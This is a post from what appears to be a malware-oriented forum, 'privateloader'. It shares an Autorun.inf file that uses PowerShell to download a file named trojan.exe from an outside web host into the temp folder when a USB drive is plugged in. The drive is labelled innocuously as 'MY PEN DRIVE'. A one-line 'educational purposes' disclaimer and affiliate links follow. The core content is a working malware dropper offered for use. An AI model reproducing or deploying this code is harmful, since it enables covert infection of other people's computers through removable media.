Privateloader

Would you like to react to this message? Create an account in a few clicks or log in to continue.
Privateloader

Release forum for privateloader


    Autorun.inf + PowerShell - Download a file when a USB pen drive is connected

    privateloader
    privateloader
    Admin


    Broj postova : 848
    Join date : 2020-11-24

    Autorun.inf + PowerShell - Download a file when a USB pen drive is connected Empty Autorun.inf + PowerShell - Download a file when a USB pen drive is connected

    Post by privateloader Mon Jun 24, 2024 5:03 pm

    Download a file when a USB pen drive is connected.

    Code:

    [AutoRun]
    icon=%temp%\trojan.exe
    open=cmd.exe /c PowerShell.exe -Command "(New-Object System.Net.WebClient).DownloadFile('http://hacxx.com/trojan.exe', '%temp%\trojan.exe')"
    label=MY PEN DRIVE

    This script is for educational purposes. Unauthorized downloading or execution of files on someone else's system is illegal and unethical. Always obtain proper authorization before running such scripts.

    Modern versions of Windows have significantly restricted the capabilities of autorun to prevent malware propagation. As a result, this script may not work on newer versions of Windows due to these security measures.


    _________________

    PacketStream - Make up to $0.10 per GB. Minimum Payout: $5.00 - http://bit.ly/Packet_Stream
    Protect yourself with Pure VPN - https://billing.purevpn.com/aff.php?aff=44512

      Current date/time is Fri Jun 28, 2024 5:13 pm